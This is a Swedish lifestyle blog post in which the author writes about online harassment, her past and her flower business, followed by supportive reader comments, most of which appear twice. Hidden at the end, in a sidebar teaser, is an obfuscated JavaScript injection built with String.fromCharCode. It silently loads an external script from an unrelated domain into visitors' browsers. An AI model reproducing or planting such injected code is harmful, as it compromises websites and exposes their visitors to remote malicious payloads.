Genom sig själv känner man andra!!!

image Hej fina!

”GENOM SIG SJÄLV KÄNNER MAN ANDRA”

egentligen inte mycket att klaga på just nu! Solen skiner, stoltheten att ha klarat av mitt delmål MILEN gör gott för både självkänslan och Egot!

Men mitt i ”paradiset” så dyker det ändå upp en otroligt massa näthat! Vad är det för fel på Människor? Varför lägga energin, läsa/följa mig och ännu värre ta sog tiden till att kommentera/maila????! -Varför?! Ju större bloggen blivit, ju mer näthat kommer det! Men herregud, det är 2016, blogg är ett yrke idag. Socialamedier har vuxit och kommer att fortsätta växa!

Det som skrämmer mig är att man blir lättillgänglig och att folk vågar ta sig friheter och angripa ens privatliv! UTAN konsekvenser!!! Vågar dessa ”nättrollen” säga samma saker irl, som dom skriver bakom sina skärmar???

Min uppfattning är att många av er här inne uppfattar MIG som väldigt självsäker. Till viss del så stämmer det, jag VET att jag alltid klarar mig, jag ÄR en fighter, en kämpe och ett ”maskrosbarn” . Mitt extremt trassliga förflutna har gett mig skinn på näsan, gjort mig stark och format mig till en street-smart kvinna, entreprenör och mamma.

Med risk för att blotta mig något…… En av mina sämre sidor är tex att jag har väldigt svår separationsångest.

Det kan handla alltifrån en kärleksrelation, vänskapsrelation, arbetskollega… Jag tycker verkligen inte om separationer!

Kanske pga att jag själv blivit lämnad, övergiven och trampad på! I MÅNGA relationer, både som barn och vuxen!  Lillemans pappa svek mig, krossade mig och fick mig att tappa andan helt! Idag har vi en bra relation och det är preskiberat, och vi båda ser endast till Ludvigs bästa!

jobbmässigt så har jag ALLTID fått överbevisa mig själv, kämpat för min sak. I ALLA lägen! 

Utan utbildning, utan någon att luta mig emot så startade jag mitt första egna företag My’s Blommor. Jag blev ifrågasatt, inget stöd ifrån bank, kommun eller leverantörer, m.m

Vem trodde på en 18 årig tjej med blonderat hår och trasiga skor? Ingen!

Knappt min egna (dåvarande) sambo!

Men jag gav mig tusan på det, jag skulle skapa mig ett liv, en trygghet och ett ”vanligt liv” som jag så länge hade drömt om….. Jag bestämde mig för att ta avstånd till allt mörkt, svart och det ”onda” som varit som en mardröm Under flera års tid. Jag blev vuxen åt helvete för tidigt, ochfokusera uppleva saker som INGEN ska behöva uppleva. Men istället för att sätta mig i en ”offer position” och lpta det mörka jag varit med om spegla hel min framtid, så valde jag att använda det till min fördel, förvandla det mörka till en ljus styrka! Tror du det har varit lätt? Nej, verkligen inte! Men man har ändå alltid ett val! Man kan påverka sin egen framtid! Man kan inte göra någonting åt det som varit, men framtiden kan DU påverka!!!

Jag sa som kungen är känd för att säga ”nu vänder vi blad”

Men ibland, när det kommer situationer där man blir svag, som tex det spm hände med Lilleman i söndags. Jag höll på att förlora honom i min famn, jag upplevde en rädsla aom jag aldrig Känt! Jag kände rädslan och paniken genom honom!

Då blev jag svag, och skör! Rädd att förlora det enda som faktiskt betyder något. Jag blev sårbar, och då kommer även det förflutna ifatt….. Men då låter jag mig också vara svag, och ledsen en stund. Det är helt okay! För sen reser jag mig stark igen! 

Just nu utsätts jag för extremt mycket näthat! Elaka kommentarer, mail, Fb meddelanden osv.. Vissa är en stark hotbild, andra är bara ute efter att sätta mig ur balans…..

Men oavsett vad så gör det mig riktigt förbannad! Jag nämnde bla ”Blogg hora” vem har rätten att kalla mig det?! Om en kvinna på tex Apoteket blivit kallad ”apoteks hora” eller någon i regeringen ”regerings hora” vad hade konsekvensens blivit då??? 

Bloggen är en stor del av mitt liv, det är mitt jobb som jag brinner för! Jag är både, glad, stolt och tacksam för att jag genom den kan påverka, stötta och lyfta fram och ibland inspirera andra människor!

Om du visste en bråkdel av vad jag varit med om, så tror jag med ganska stark övertygelse att du ändrat din syn på mig en aning…

Jag är inte redo att berätta min ”historia”. Än. Jag skriver på en självbiografi, sakta men säkert, anledningen till detta är att jag shöll brinner för att i framtiden kunna hjälpa andra som varit med om liknade saker eller tom med befinner sig i liknande situationer som jag har erfarenheterna utav. Jag vill använda min erfarenhet till att hjälpa andra! 

Men oavsett vad så ber jag dig/er som trakasserar mig  genom detta inlägget att INTE sprida näthat! Här inne ska vi stötta, lyfta fram varandra och sprida kärlek och värme!

Man behöver inte tycka lika, man behöver inte tycka som Jag. Man har självklart rätt till sin åsikt! MEN det är stor skillnad på att ha skilda åsikter till att gå till personangrepp, hot och förtal! (Ni vet villa ni är) jag kommer INTE att hänga ut er här! Men lämna mig, Lilleman, och mina nära och kära ifred! På riktigt! Nu ska jag återgå till paradiset, men jg behövde verkligen få skriva av mig nu…. -Tack för att du lyssnade! Dela gärna mitt inlägg och säg #NEJTILLNÄTHATimage

Kramar /My Martens 

56 Komentarer

 1. Fina du.Bry dig inte om som inte kan ta att du har det bra.Det är du värd med råge. Förstår inte varför man läser en blogg om man inte gillar den. Ha det bra,Du är bra!

 2. Hej My!
  Jag tycker du är helt fantastisk, du är vacker o en otrolig inspirationskälla för mig…
  Allt du kämpar med och allt du hela tiden övervinner, det är fantastiskt. You go girl…

 3. Finfina My! Du har verkligen bevisat att Du är stark trots motgångar så har du kämpat på för att lyckas med ditt företag och att ta hand om din son på bästa vis, Jag beundrar dig för din styrka och du är en inspirationkälla för många det vet jag! Bry dig inte om elaka saker skrivs om dig, det är svårt att låta bli ibland, men de som skriver skit förtjänar inte att du bryr dig! Stå på dig och go girl!!!Ölandskramar!

 4. Det är så fascinerande att människor verkligen tar tid av sina korta dyrbara liv att sitta och spy ur sig elakheter till andra. Vad de inte förstår är hur mycket negativt de drar till sig själva när de gör så. Din blogg sprider glädje och optimism men bjuder också på jordnära realism. Att din livsstil väcker avund hos människor som kanske ”sitter fast” i negativa mönster och inte kommer vidare i sina egna liv, beror nog på djupt primitiva mekanismer i människor vilket skapar det primitiva beteende som mobbarna har. Att sitta bakom en skärm skapar tydligen en falsk trygghet, men man skulle önska att människor hade mer folkvett och framför allt medmänsklighet. Vi är många som gillar din blogg och kom alltid ihåg att vi positiva är många många fler även om de negativa försöker få dig att tro nåt annat! Lycka till i fortsättningen, tuta och kör, fortsätt framåt! ? Kram!

 5. hoppas verkligen inte att du tar åt dig utav allt näthat, utan låter det gå förbi. Det säger mer om dom personerna som skriver sånt skit. Jag undrar hur dom som skriver sånt kan stå ut med sig själva, att ha så mycket ondska i sig måste ju va jobbigt. Kram

 6. Hej på dig fiining! Jag håller inte alltid med i allt som skrivs i olika bloggar, MEN OM, jag lämnar ett avtryck i form av en kommentar,så vill jag alltid att den ska vara peppande eller upplyftande på något vis. Annars låter jag bli ? Du verkar vara en GRYM mamma, och du kämpar på helt fantastiskt med att ”rodda” med allt du har omkring dig. Hoppas du får en härlig sommar med dina nära och kära <3

 7. Fina du.Bry dig inte om som inte kan ta att du har det bra.Det är du värd med råge. Förstår inte varför man läser en blogg om man inte gillar den. Ha det bra,Du är bra!

 8. Hej My!
  Jag tycker du är helt fantastisk, du är vacker o en otrolig inspirationskälla för mig…
  Allt du kämpar med och allt du hela tiden övervinner, det är fantastiskt. You go girl…

 9. Lider verkligen med dig. Fattar inte varför man läser en blogg om man inte gillar den.
  Tycker du är en stor inspirationskälla och jag älskar att läsa din blogg, trots att jag är gammal nog att vara din mamma. Stå på dig, fina du <3

 10. Finfina My! Du har verkligen bevisat att Du är stark trots motgångar så har du kämpat på för att lyckas med ditt företag och att ta hand om din son på bästa vis, Jag beundrar dig för din styrka och du är en inspirationkälla för många det vet jag! Bry dig inte om elaka saker skrivs om dig, det är svårt att låta bli ibland, men de som skriver skit förtjänar inte att du bryr dig! Stå på dig och go girl!!!Ölandskramar!

 11. Det är så fascinerande att människor verkligen tar tid av sina korta dyrbara liv att sitta och spy ur sig elakheter till andra. Vad de inte förstår är hur mycket negativt de drar till sig själva när de gör så. Din blogg sprider glädje och optimism men bjuder också på jordnära realism. Att din livsstil väcker avund hos människor som kanske ”sitter fast” i negativa mönster och inte kommer vidare i sina egna liv, beror nog på djupt primitiva mekanismer i människor vilket skapar det primitiva beteende som mobbarna har. Att sitta bakom en skärm skapar tydligen en falsk trygghet, men man skulle önska att människor hade mer folkvett och framför allt medmänsklighet. Vi är många som gillar din blogg och kom alltid ihåg att vi positiva är många många fler även om de negativa försöker få dig att tro nåt annat! Lycka till i fortsättningen, tuta och kör, fortsätt framåt! 🙂 Kram!

 12. Endast avundsjuka olyckliga människor som är elaka! Såklart inte kul men bry dig inte om dem. Dom är dom som verkligen inte mår bra!! Kram!

 13. hoppas verkligen inte att du tar åt dig utav allt näthat, utan låter det gå förbi. Det säger mer om dom personerna som skriver sånt skit. Jag undrar hur dom som skriver sånt kan stå ut med sig själva, att ha så mycket ondska i sig måste ju va jobbigt. Kram

 14. Hej på dig fiining! Jag håller inte alltid med i allt som skrivs i olika bloggar, MEN OM, jag lämnar ett avtryck i form av en kommentar,så vill jag alltid att den ska vara peppande eller upplyftande på något vis. Annars låter jag bli 🙂 Du verkar vara en GRYM mamma, och du kämpar på helt fantastiskt med att ”rodda” med allt du har omkring dig. Hoppas du får en härlig sommar med dina nära och kära <3

 15. Lider verkligen med dig. Fattar inte varför man läser en blogg om man inte gillar den.
  Tycker du är en stor inspirationskälla och jag älskar att läsa din blogg, trots att jag är gammal nog att vara din mamma. Stå på dig, fina du <3

 16. Endast avundsjuka olyckliga människor som är elaka! Såklart inte kul men bry dig inte om dem. Dom är dom som verkligen inte mår bra!! Kram!

 17. Läser med förskräckelse din blogg om hur vissa människor beter sig.
  Det är så sjukt som det någonsin kan vara.
  Hoppas att alla goda kommentarer övervinner allt skit.
  Fortsätt i dina fotspår och du är jättefin och bra på alla sätt.

 18. Fina My !!!!
  Du är en fantastisk inspiration för många och en fantastisk mamma till lilleman:)
  Tyvärr så finns det som du beskriver näthat och de gör allt för att komma åt dig!!! låt dem inte komma åt dig…… Du vet din egen historia!!!
  De får söka egna sätt att lösa sina problem..
  Du har valt din väg och låt dem inte förstöra och grusa din din väg som du kämpat för.
  Fortsätt inspirera och våga vara öppen och bara vara du, begränsas ej av deras hat!!
  Vi finns här vi andra som vill sprida kärlek precis som du.
  Kärlek kommer alltid segra!!
  Kramiz Lize

 19. Läser med förskräckelse din blogg om hur vissa människor beter sig.
  Det är så sjukt som det någonsin kan vara.
  Hoppas att alla goda kommentarer övervinner allt skit.
  Fortsätt i dina fotspår och du är jättefin och bra på alla sätt.

 20. Fina My !!!!
  Du är en fantastisk inspiration för många och en fantastisk mamma till lilleman:)
  Tyvärr så finns det som du beskriver näthat och de gör allt för att komma åt dig!!! låt dem inte komma åt dig…… Du vet din egen historia!!!
  De får söka egna sätt att lösa sina problem..
  Du har valt din väg och låt dem inte förstöra och grusa din din väg som du kämpat för.
  Fortsätt inspirera och våga vara öppen och bara vara du, begränsas ej av deras hat!!
  Vi finns här vi andra som vill sprida kärlek precis som du.
  Kärlek kommer alltid segra!!
  Kramiz Lize

 21. Hej My!
  Jag har läst din blogg väldigt länge nu och tycker den är fantastisk!
  Jag bor på öland och brukar vara i din butik och den är helt underbar! Allt slit du gör och allt du varit med om och som ensamstående mamma är helt otroligt ? Du inspirerar verkligen!! Och grymt bra gjort att du klarade milen ?

 22. Hej My!

  Jag har läst din blogg väldigt länge nu och tycker den är fantastisk!
  Jag bor på öland och brukar vara i din butik och den är helt underbar! Allt slit du gör och allt du varit med om och som ensamstående mamma är helt otroligt 🙂 Du inspirerar verkligen!! Och grymt bra gjort att du klarade milen 😀

 23. Har så svårt att förstå hur vissa personer är så intresserade av att prata om andra.
  Förtal, lögner , svek och brustna förtroenden det är bara energitjuvar och dom ska man sortera bort i sitt liv så gott man kan

 24. Tycker att du gör ett grymt bra jobb.Du skriver äkta och inspirerande. Så tråkigt när det finns avundsjuka människor som sitter fega bakom en skärm och skriver elaka saker. Massor av styrkekramar till dig.

 25. Hej brukar läsa din blogg och finner den inspirerande, både vad gäller entreprenörskap,kost och träning.. samt att få ihop alla måsten kring när man är ensamstående mamma. Strunta i trollen.. vet att det är lättare sagt än gjort ibland.. Men önskar dig en riktig underbar dag och grattis till milen ?

 26. Shit vad duktigt av dig att springa milen, grattis och bra jobbat! Jag siktar oxo dit och du är en fin inspirations källa.
  Tråkigt att du blir utsatt för nättroll. Det känns så onödigt och fegt. Jag hejjar på dej iaf. Kram

 27. Har så svårt att förstå hur vissa personer är så intresserade av att prata om andra.
  Förtal, lögner , svek och brustna förtroenden det är bara energitjuvar och dom ska man sortera bort i sitt liv så gott man kan

 28. Tycker att du gör ett grymt bra jobb.Du skriver äkta och inspirerande. Så tråkigt när det finns avundsjuka människor som sitter fega bakom en skärm och skriver elaka saker. Massor av styrkekramar till dig.

 29. Hej brukar läsa din blogg och finner den inspirerande, både vad gäller entreprenörskap,kost och träning.. samt att få ihop alla måsten kring när man är ensamstående mamma. Strunta i trollen.. vet att det är lättare sagt än gjort ibland.. Men önskar dig en riktig underbar dag och grattis till milen 🙂

 30. Shit vad duktigt av dig att springa milen, grattis och bra jobbat! Jag siktar oxo dit och du är en fin inspirations källa.
  Tråkigt att du blir utsatt för nättroll. Det känns så onödigt och fegt. Jag hejjar på dej iaf. Kram

 31. Nej det är inte ett arbete Ö blogga det är ju som ö skriva dagbok fast på en data. Människor sliter inom värden mm ö så tycker en del att blogga om snygga kläder är ett jobb. Lägg av det är o göra mer vanligt folk.

  • Ö, Ö, Ö ? Förlåt mig Kurt jag tror inte riktigt du förstår värdet i att annonsera och marknadsföra sig genom sociala medier. Samhället har styrt om kraftigt åt just det hållet =) Jag själv som egenföretagare sedan myndig ålder vet hur många hundratusentals kronor jag själv lagt på marknadsföring för min butik My’s Blommor på Öland, i just lokaltidningar. Detta då per år. Det är tufft för tidningsbranschen idag då fler och fler väljer bort våra fantastiska magasin för webbrelaterade sajter. Så därför är vi som företagare beroende utav att marknadsföra oss på nätet =) Detta gäller ju ALLA företag, klädföretag, apoteket, ICA, Cancerfonden, röda korset m.m. Så det är inte bara ett jobb, det är i mitt fall ett, ab, en plattform och ett starkt växande företag, som jag dessutom brinner för =) Lång historia kort… Mvh

 32. Du är så fin My!! Har en fråga, hur tränade du för att få bort magen?? jag själv kämpar med träning och kost men magen är svinsvår att få bort, har du nåt tips? ?

 33. Nej det är inte ett arbete Ö blogga det är ju som ö skriva dagbok fast på en data. Människor sliter inom värden mm ö så tycker en del att blogga om snygga kläder är ett jobb. Lägg av det är o göra mer vanligt folk.

  • Ö, Ö, Ö ? Förlåt mig Kurt jag tror inte riktigt du förstår värdet i att annonsera och marknadsföra sig genom sociala medier. Samhället har styrt om kraftigt åt just det hållet =) Jag själv som egenföretagare sedan myndig ålder vet hur många hundratusentals kronor jag själv lagt på marknadsföring för min butik My’s Blommor på Öland, i just lokaltidningar. Detta då per år. Det är tufft för tidningsbranschen idag då fler och fler väljer bort våra fantastiska magasin för webbrelaterade sajter. Så därför är vi som företagare beroende utav att marknadsföra oss på nätet =) Detta gäller ju ALLA företag, klädföretag, apoteket, ICA, Cancerfonden, röda korset m.m. Så det är inte bara ett jobb, det är i mitt fall ett, ab, en plattform och ett starkt växande företag, som jag dessutom brinner för =) Lång historia kort… Mvh

 34. Du är så fin My!! Har en fråga, hur tränade du för att få bort magen?? jag själv kämpar med träning och kost men magen är svinsvår att få bort, har du nåt tips? 🙂

 35. Hej My jag har följt dina och Åzas eskapader den senaste veckan och har inte haft så roligt på en lång tid. Jag är vad som kan kallas en sjukpensionär efter en stroke och har inte mycket att göra under dagarna , har också funderat på en biografi för att ha något att göra.
  Tycker att resan till Spanien är så roligt att läsa om , Jag bor numera i USA så om du har tid och tycke är du välkommen att hälsa på när du skall springa tjejmilen i New York. Bor i South Bend Indiana och kan hämta i Chicago , kontakta mail eller telefon , tänk på det och du får gärna ta med dig Åsa också , Hör av dig / Lasse

 36. Hej My jag har följt dina och Åzas eskapader den senaste veckan och har inte haft så roligt på en lång tid. Jag är vad som kan kallas en sjukpensionär efter en stroke och har inte mycket att göra under dagarna , har också funderat på en biografi för att ha något att göra.
  Tycker att resan till Spanien är så roligt att läsa om , Jag bor numera i USA så om du har tid och tycke är du välkommen att hälsa på när du skall springa tjejmilen i New York. Bor i South Bend Indiana och kan hämta i Chicago , kontakta mail eller telefon , tänk på det och du får gärna ta med dig Åsa också , Hör av dig / Lasse

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/